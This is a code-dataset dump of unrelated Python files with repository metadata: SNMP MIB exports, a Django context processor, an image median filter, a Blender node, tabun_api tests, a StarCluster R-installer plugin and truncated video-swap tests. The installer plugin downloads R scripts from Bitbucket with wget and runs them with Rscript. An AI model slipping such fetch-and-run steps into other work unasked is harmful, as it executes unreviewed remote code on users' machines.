commonDeviceId=commonDeviceId, oaVendorOID=oaVendorOID, alarmLogLastIndex=alarmLogLastIndex, commonTrapCommunityString=commonTrapCommunityString, commonReset=commonReset, commonMacAddress=commonMacAddress, discretePropertyTable=discretePropertyTable, analogAlarmHI=analogAlarmHI, commonForwardPathCRCErrors=commonForwardPathCRCErrors, commonNEStatus=commonNEStatus, oaIdent=oaIdent, commonDeviceOID=commonDeviceOID, commonInvalidMacCmds=commonInvalidMacCmds, oaPumpBIAS=oaPumpBIAS, commonTrapAck=commonTrapAck, commonDeviceVendor=commonDeviceVendor, commonDeviceResetCause=commonDeviceResetCause, commonDeviceFW=commonDeviceFW, alarmText=alarmText, commonAdminUseEthernet=commonAdminUseEthernet, oaDCPowerVoltage=oaDCPowerVoltage, oaDCPowerName=oaDCPowerName, commonDeviceTamperStatus=commonDeviceTamperStatus, commondownload=commondownload, commonDeviceNum=commonDeviceNum, oaNumberDCPowerSupply=oaNumberDCPowerSupply, alarmLogInformation=alarmLogInformation, commonAlarmDetectionControl=commonAlarmDetectionControl, analogParameterOID=analogParameterOID, commonAgentBootWay=commonAgentBootWay, commonInternalTemperature=commonInternalTemperature, commonTamperStatus=commonTamperStatus, commonMulticastAddressIndex=commonMulticastAddressIndex, alarmLogIndex=alarmLogIndex, commonNESerialNumber=commonNESerialNumber, commonProvisionedReturnPowerLevel=commonProvisionedReturnPowerLevel, analogAlarmDeadband=analogAlarmDeadband, currentAlarmState=currentAlarmState, discretePropertyEntry=discretePropertyEntry, commonDeviceReset=commonDeviceReset, commonBackoffMinimumExponent=commonBackoffMinimumExponent, commonMulticastAddressTable=commonMulticastAddressTable, analogAlarmLOLO=analogAlarmLOLO, commonAgentTrapTable=commonAgentTrapTable, commonDevicesID=commonDevicesID, commonCraftStatus=commonCraftStatus)
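Every object exported above is registered under an OID tuple such as `(1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 1)`. A minimal sketch (helper name is an assumption) of rendering one of these tuples in dotted-decimal notation, e.g. for use with command-line SNMP tools:

```python
# commonDeviceNum's OID as defined in this module.
COMMON_DEVICE_NUM_OID = (1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 1)

def oid_to_dotted(oid):
    """Join the arcs of an OID tuple into a dotted-decimal string."""
    return ".".join(str(arc) for arc in oid)

print(oid_to_dotted(COMMON_DEVICE_NUM_OID))  # 1.3.6.1.4.1.17409.1.3.3.2.1
```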
| 143.893204 | 5,737 | 0.789404 | 7,028 | 59,284 | 6.659789 | 0.110273 | 0.010939 | 0.113514 | 0.012306 | 0.500395 | 0.36432 | 0.317787 | 0.29969 | 0.274607 | 0.261254 | 0.000101 | 0.056326 | 0.091104 | 59,284 | 411 | 5,738 | 144.243309 | 0.812204 | 0.00533 | 0 | 0 | 0 | 0.118812 | 0.29166 | 0.004054 | 0 | 0 | 0.000068 | 0 | 0 | 1 | 0 | false | 0 | 0.014851 | 0 | 0.014851 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f89f9d595d76922df28dcd1b0504933e5a49f052 | 527 | py | Python | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | from auctions.models import *
def get_watchlist(request):
    """Expose the current user's watchlist count to every template."""
    watchlist_number = ""
    if request.user.is_authenticated:
        watchlist_number = WatchList.objects.filter(
            user_watcher=request.user
        ).count()
    return {
        'watchlist_number': watchlist_number
    }
| 26.35 | 78 | 0.658444 | 54 | 527 | 6.240741 | 0.5 | 0.267062 | 0.21365 | 0.124629 | 0.21365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.265655 | 527 | 19 | 79 | 27.736842 | 0.870801 | 0 | 0 | 0.266667 | 0 | 0 | 0.060837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
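A context processor like `get_watchlist` only takes effect once it is listed in the Django settings. A minimal sketch of the relevant `TEMPLATES` entry follows; the dotted path matches the repo layout above (`auctions/context_processors.py`), while the surrounding option values are generic assumptions:

```python
# Hypothetical excerpt from the project's settings.py; only the
# get_watchlist entry is taken from the file above.
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                # Exposes 'watchlist_number' in every rendered template:
                "auctions.context_processors.get_watchlist",
            ],
        },
    }
]
```

With this in place, templates can use `{{ watchlist_number }}` directly, without each view passing it explicitly.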
f8b0dbb0df374378b1d09d8e75618bfe40e75334 | 873 | py | Python | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | # Universidade Federal de Viçosa - Campus Rio Paranaíba
# Information Systems - Digital Image Processing
#
# Professor: Joao Mari
# Authors:
# - MatheusRV (3929)
# - iguit0 (3902)
# - ThiagoMunich (3628)
#
# Spatial filtering for smoothing - median filter
# How to run:
#   $ python med.py img_1.tif output <mask_size>
#   <mask_size> is an integer. Example: mask_size=3 gives a 3x3 mask
import sys
from scipy.ndimage import filters
from scipy import misc
def loadImg(arg):
return misc.imread(arg)
img = loadImg(sys.argv[1])
saida = sys.argv[2] + '_mediana.tif'
ms = sys.argv[3]
ms = int(ms)
img_mediana = filters.median_filter(img, size=ms)
img_saida = misc.imsave(saida, img_mediana)
| 25.676471 | 93 | 0.721649 | 129 | 873 | 4.813953 | 0.658915 | 0.038647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.186712 | 873 | 33 | 94 | 26.454545 | 0.846479 | 0.504009 | 0 | 0 | 0 | 0 | 0.02864 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.466667 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
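What `filters.median_filter` buys over a mean filter is easiest to see on impulse noise. A pure-NumPy reference sketch (the helper name `median3x3` is an illustration, not part of the script above):

```python
import numpy as np

def median3x3(img):
    """Naive 3x3 median filter with edge replication, for reference only."""
    padded = np.pad(img, 1, mode="edge")
    out = np.empty_like(img)
    for i in range(img.shape[0]):
        for j in range(img.shape[1]):
            out[i, j] = np.median(padded[i:i + 3, j:j + 3])
    return out

# A single bright outlier (salt noise) in a flat image is removed entirely:
# every 3x3 neighbourhood contains at most one 255, so its median stays 0.
img = np.zeros((5, 5), dtype=np.uint8)
img[2, 2] = 255
assert median3x3(img).max() == 0
```

A mean filter would instead smear the outlier into its neighbours, which is why the median is preferred for salt-and-pepper noise.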
f8c48be304b1a548130ccc797d3d65f47accef6d | 1,496 | py | Python | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | import bpy
from bpy.props import *
from ...nodes.BASE.node_tree import RenderStackNode
def update_node(self, context):
self.update_parms()
class RenderNodeSceneRenderEngine(RenderStackNode):
"""A simple input node"""
bl_idname = 'RenderNodeSceneRenderEngine'
bl_label = 'Scene Render Engine'
_enum_item_hack = []
def init(self, context):
self.outputs.new('RSNodeSocketTaskSettings', "Settings")
def draw_buttons(self, context, layout):
        col = layout.column(align=True)
col.prop(self, "engine")
def process(self):
self.compare(bpy.context.scene.render, 'engine', self.engine)
def engine_enum_items(self, context):
enum_items = RenderNodeSceneRenderEngine._enum_item_hack
enum_items.clear()
        # append the built-in engines (Eevee and Workbench)
enum_items.append(('BLENDER_EEVEE', 'Eevee', ''))
enum_items.append(('BLENDER_WORKBENCH', 'Workbench', ''))
addon = [engine.bl_idname for engine in bpy.types.RenderEngine.__subclasses__()]
# append to enum_items
for name in addon:
enum_items.append((name, name.capitalize(), ''))
return enum_items
temp = engine_enum_items
    engine: EnumProperty(name='Engine', description='Render engine available',
items=temp, update=update_node)
def register():
bpy.utils.register_class(RenderNodeSceneRenderEngine)
def unregister():
bpy.utils.unregister_class(RenderNodeSceneRenderEngine)
| 27.2 | 88 | 0.680481 | 164 | 1,496 | 6.006098 | 0.414634 | 0.082234 | 0.045685 | 0.04467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000847 | 0.210562 | 1,496 | 54 | 89 | 27.703704 | 0.833192 | 0.042781 | 0 | 0 | 0 | 0 | 0.114386 | 0.035789 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21875 | false | 0 | 0.09375 | 0 | 0.53125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f8c96c26d60fafc372cb50608cf2a61feb03cd36 | 14,688 | py | Python | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 7 | 2015-06-18T04:57:58.000Z | 2021-05-24T05:36:39.000Z | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 1 | 2015-07-02T00:02:44.000Z | 2015-07-02T01:40:14.000Z | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 3 | 2015-07-03T02:20:05.000Z | 2017-01-17T20:30:09.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=W0611, W0613, W0621, E1101
from __future__ import unicode_literals
import time
import json
from io import BytesIO
import pytest
import tabun_api as api
from tabun_api.compat import text
from testutil import UserTest, load_file, form_intercept, as_guest, set_mock, user, assert_data
def test_get_posts_data_ok(user):
post_data = json.loads(load_file('index_posts.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
def test_get_posts_data_ok_without_escape(user):
def noescape(data, may_be_short=False):
return data
old_escape = api.utils.escape_topic_contents
api.utils.escape_topic_contents = noescape
try:
post_data = json.loads(load_file('index_posts.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
finally:
api.utils.escape_topic_contents = old_escape
def test_get_posts_profile_data_ok(user, set_mock):
set_mock({'/profile/test/created/topics/': 'profile_topics.html'})
post_data = json.loads(load_file('profile_topics.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/profile/test/created/topics/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
def test_get_posts_types_ok(user):
posts = reversed(user.get_posts('/'))
for post in posts:
assert isinstance(post.author, text)
assert post.blog is None or isinstance(post.blog, text)
assert isinstance(post.blog_name, text)
assert isinstance(post.title, text)
assert isinstance(post.raw_body, text)
assert isinstance(post.tags[0], text)
assert isinstance(post.comments_count, int)
assert post.cut_text is None or isinstance(post.cut_text, text)
assert isinstance(post.context, dict)
def test_get_posts_context_user_ok(user):
posts = reversed(user.get_posts('/'))
for post in posts:
c = post.context
assert isinstance(c['username'], text)
assert isinstance(c['http_host'], text)
assert isinstance(c['url'], text)
assert isinstance(c['can_comment'], type(None)) # not available on lists
assert isinstance(c['can_edit'], bool)
assert isinstance(c['can_delete'], bool)
assert isinstance(c['can_vote'], bool)
assert isinstance(c['vote_value'], (int, type(None))) # None is not voted
assert isinstance(c['favourited'], bool)
assert isinstance(c['subscribed_to_comments'], type(None)) # not available on lists
assert isinstance(c['unread_comments_count'], int)
def test_get_posts_context_guest_ok(user, as_guest):
posts = reversed(user.get_posts('/'))
for post in posts:
c = post.context
assert isinstance(c['username'], type(None))
assert isinstance(c['http_host'], text)
assert isinstance(c['url'], text)
        assert isinstance(c['can_comment'], type(None))  # not available on lists
assert isinstance(c['can_edit'], bool)
assert isinstance(c['can_delete'], bool)
assert isinstance(c['can_vote'], bool)
assert isinstance(c['vote_value'], (int, type(None))) # None is not voted
assert isinstance(c['favourited'], bool)
assert isinstance(c['subscribed_to_comments'], type(None)) # not available on lists
assert isinstance(c['unread_comments_count'], int)
def test_get_post_ok(user):
post = user.get_post(132085)
assert post.post_id == 132085
assert post.author == 'test'
assert post.private is False
assert post.blog is None
assert post.draft is True
assert post.short is False
assert time.strftime("%Y-%m-%d %H:%M:%S", post.time) == "2015-05-30 19:14:04"
assert post.utctime.strftime('%Y-%m-%d %H:%M:%S') == '2015-05-30 16:14:04'
assert post.title == 'Тест'
assert post.raw_body == '<strong>Раз</strong><br/>\n<h4>Два</h4>И ломаем вёрстку <img src="http://ya.ru/" alt="'
assert post.tags == ["тег1", "тег2"]
assert post.cut_text is None
assert post.comments_count == 5
assert post.context['username'] == 'test'
assert post.context['http_host'] == 'https://tabun.everypony.ru'
assert post.context['url'] == 'https://tabun.everypony.ru/blog/132085.html'
assert post.context['can_comment'] is True
assert post.context['can_edit'] is True
assert post.context['can_delete'] is True
assert post.context['can_vote'] is False
assert post.context['vote_value'] is None
assert post.context['favourited'] is False
assert post.context['subscribed_to_comments'] is True
assert post.context['unread_comments_count'] == 0
def test_get_post_other_ok(user):
post = user.get_post(138982, 'borderline')
assert post.post_id == 138982
assert post.author == 'test2'
assert post.private is True
assert post.blog == 'borderline'
assert post.draft is False
assert post.short is False
assert time.strftime("%Y-%m-%d %H:%M:%S", post.time) == "2015-09-10 15:39:13"
assert post.title == 'Тестирование ката'
assert post.raw_body == '<img src="https://i.imgur.com/V3KzzyAs.png"/>Текст до ката<br/>\n<a></a> <br/>\nТекст после ката<img src="https://i.imgur.com/NAg929K.jpg"/>'
assert post.tags == ["Луна", "аликорны", "новость"]
assert post.comments_count == 0
assert post.cut_text is None
assert post.vote_count == 35
assert post.vote_total == 36
assert post.context['username'] == 'test'
assert post.context['http_host'] == 'https://tabun.everypony.ru'
assert post.context['url'] == 'https://tabun.everypony.ru/blog/borderline/138982.html'
assert post.context['can_comment'] is False
assert post.context['can_edit'] is False
assert post.context['can_delete'] is False
assert post.context['can_vote'] is False
assert post.context['vote_value'] == 1
assert post.context['favourited'] is True
assert post.context['subscribed_to_comments'] is False
assert post.context['unread_comments_count'] == 0
def test_get_post_other_blog_1(set_mock, user):
set_mock({'/blog/news/132085.html': ('132085.html', {'url': '/blog/132085.html'})})
assert user.get_post(132085, 'news').blog is None
def test_get_post_other_blog_2(set_mock, user):
set_mock({'/blog/blog/132085.html': ('132085.html', {'url': '/blog/132085.html'})})
assert user.get_post(132085, 'blog').blog is None
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_add_post_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/topic/add/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/topic/add/')
def topic_add(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.add_post(blog_id, 'Т0', 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_add_poll_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/question/add/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/question/add/')
def poll_add(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('answer[]') == [b'foo', b'bar']
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.add_poll(blog_id, 'Т0', ('foo', 'bar'), 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
def test_add_poll_error(set_mock, user):
set_mock({'/question/add/': 'topic_add_error.html'})
with pytest.raises(api.TabunResultError) as excinfo:
user.add_poll(None, '', ('foo', 'bar'), '', [])
# TODO: test len(choices) > 20
assert excinfo.value.message == 'Поле Заголовок слишком короткое (минимально допустимо 2 символов)'
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_edit_post_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/topic/edit/1/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/topic/edit/1/')
def topic_edit(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.edit_post(1, blog_id, 'Т0', 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
def test_edit_post_error(set_mock, user):
set_mock({'/topic/edit/1/': 'topic_add_error.html'})
with pytest.raises(api.TabunResultError) as excinfo:
user.edit_post(1, None, '', '', [])
assert excinfo.value.message == 'Поле Заголовок слишком короткое (минимально допустимо 2 символов)'
# The hashsum tests guarantee backwards compatibility, so it's best not to touch them
def test_post_hashsum_default(user):
p = user.get_posts('/')
oldver_fields = ('post_id', 'time', 'draft', 'author', 'blog', 'title', 'body', 'tags')
assert p[0].post_id == 100000
assert p[0].hashsum(oldver_fields) == 'e93efead3145c59b9aac26037b9c5fcf'
assert p[1].post_id == 131909
assert p[1].hashsum(oldver_fields) == 'b6147c9ba6dbc7e8e07db958390108bd'
assert p[2].post_id == 131911
assert p[2].hashsum(oldver_fields) == '33b7a175c45eea8e5f68f4bc885f324b'
assert p[3].post_id == 131915
assert p[3].hashsum(oldver_fields) == '51b480ee57ee3166750e4f15f6a48f1f'
assert p[4].post_id == 131904
assert p[4].hashsum(oldver_fields) == 'd28e3ff695cd4cdc1f63e5919da95516'
assert p[5].post_id == 131937
assert p[5].hashsum(oldver_fields) == '93ef694d929b03b2f48b702ef68ce77b'
assert p[0].hashsum() == '2f452e09ee106a2beeb5a48927ad72b3'
assert p[1].hashsum() == '5308ccc03831ea4f4f3f3661440fcc75'
assert p[2].hashsum() == 'fb329febe4d073359b1d974098557994'
assert p[3].hashsum() == 'bed41b4d1ab3fa5b6b340f186067d6d5'
assert p[4].hashsum() == '2c49d10769e1fb28cb78cfaf8ac6cd0e'
assert p[5].hashsum() == '6c35ba542fd4f65ab9aac97943ca6672'
def test_post_hashsum_part(user):
p = user.get_posts('/')
assert p[0].post_id == 100000
assert p[0].hashsum(('title', 'body', 'tags')) == 'efeff4792ac7666c280b06d6d0ae1136'
assert p[1].post_id == 131909
assert p[1].hashsum(('title', 'body', 'tags')) == 'dacf2a4631636a1ab796681d607c11e0'
assert p[2].post_id == 131911
assert p[2].hashsum(('title', 'body', 'tags')) == '1381908ebf93038617b400f59d97646a'
assert p[3].post_id == 131915
assert p[3].hashsum(('title', 'body', 'tags')) == '9fbca162a43f2a2b1dff8c5764864fdf'
assert p[4].post_id == 131904
assert p[4].hashsum(('title', 'body', 'tags')) == '61a43c4d0f33313bfb4926fb86560450'
assert p[5].post_id == 131937
assert p[5].hashsum(('title', 'body', 'tags')) == 'a49976cb3879a540334a3e93f57a752e'
    # Because mixing \n and \r\n in the files, the same way the site does, is a real pain
p[0].raw_body = p[0].raw_body.replace('\n', '\r\n')
assert p[0].hashsum(('title', 'body', 'tags')) == '1364ee5a2fee913325d3b220d43623a5'
# TODO: rss
| 43.455621 | 170 | 0.656182 | 2,006 | 14,688 | 4.645563 | 0.14656 | 0.0558 | 0.034875 | 0.029295 | 0.710806 | 0.677326 | 0.636334 | 0.611654 | 0.604571 | 0.604357 | 0 | 0.067322 | 0.18287 | 14,688 | 337 | 171 | 43.58457 | 0.709132 | 0.027982 | 0 | 0.52381 | 0 | 0.007326 | 0.266054 | 0.081674 | 0 | 0 | 0 | 0.002967 | 0.571429 | 1 | 0.076923 | false | 0 | 0.029304 | 0.003663 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f8ccc3a249f05d3d69f60b2904dd45f6d745429d | 3,128 | py | Python | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | 1 | 2016-05-27T19:58:53.000Z | 2016-05-27T19:58:53.000Z | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | null | null | null | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | null | null | null | from starcluster.clustersetup import ClusterSetup
from starcluster.logger import log
class RInstaller(ClusterSetup):
def run(self, nodes, master, user, user_shell, volumes):
for node in nodes:
log.info("Installing R 3.1.1 on %s" % (node.alias))
log.info("...installing dependencies")
node.ssh.execute('apt-get install -y libreadline-dev ncurses-dev libpng-dev texinfo texlive texlive-base luatex texlive-latex-base texlive-luatex texlive-extra-utils texlive-latex-recommended texlive-fonts-extra freetype* libxml2 libxml2-dev libpng12-dev libcurl4-openssl-dev tk-dev xterm')
node.ssh.execute('apt-get install -y libgtk2.0-dev xorg-dev')
log.info("...dependencies installed --> --> downloading R")
node.ssh.execute('wget -c -P /opt/software/R http://cran.us.r-project.org/src/base/R-3/R-3.1.1.tar.gz')
log.info("...R has downloaded --> decompressing files")
node.ssh.execute('tar xvzf /opt/software/R/R-3.1.1.tar.gz -C /opt/software/R')
log.info("...files decompressed --> running ./configure")
node.ssh.execute('cd /opt/software/R/R-3.1.1 && ./configure --with-lapack --with-blas --with-pic --enable-threads --with-x=yes --enable-R-shlib --with-libpng --with-jpeglib --with-recommended-packages=yes')
log.info("...configure has finished --> running make")
node.ssh.execute('make -C /opt/software/R/R-3.1.1')
log.info("...make has finished --> creating modulefiles")
node.ssh.execute('mkdir -p /usr/local/Modules/applications/R/;touch /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo "#%Module" >> /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo "set root /opt/software/R/R-3.1.1" >> /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo -e "prepend-path\tPATH\t\$root/bin" >> /usr/local/Modules/applications/R/3.1.1')
log.info("...installing R packages")
log.info("...installing packages from CRAN")
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/Rprofile')
node.ssh.execute('cp /opt/software/R/Rprofile ~/.Rprofile')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_cran.R')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_bioc_1.R')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_bioc_2.R')
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_cran.R')
log.info("...CRAN packages have been installed --> installing BioConductor packages")
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_bioc_1.R')
log.info("...BioConductor1 packages have been installed")
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_bioc_2.R')
log.info("...BioConductor2 packages have been installed") | 78.2 | 293 | 0.735934 | 477 | 3,128 | 4.786164 | 0.278826 | 0.055191 | 0.110381 | 0.022777 | 0.477442 | 0.465177 | 0.452913 | 0.40035 | 0.386772 | 0.386772 | 0 | 0.062544 | 0.095269 | 3,128 | 40 | 294 | 78.2 | 0.74417 | 0 | 0 | 0 | 0 | 0.428571 | 0.730585 | 0.161393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.057143 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f8cff9c1f3626dd78542132a31d4f76a9704d49a | 1,128 | py | Python | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | import unittest
import os
from os import listdir, path
from pathlib import Path
class TestSwap(unittest.TestCase):
def test_imports(self):
from pytube import YouTube
def test_get_video(self):
from main import get_video
rickroll = 'https://youtu.be/dQw4w9WgXcQ'
video_path = get_video(rickroll)
self.assertTrue(path.exists(video_path))
def test_cut_video(self):
from main import cut_video
start = 30
length = 10
vid_path = Path("C:/Users/ru1072781/Repo/yt-swap/video_in/Rick Astley - Never Gonna Give You Up (Video).mp4")
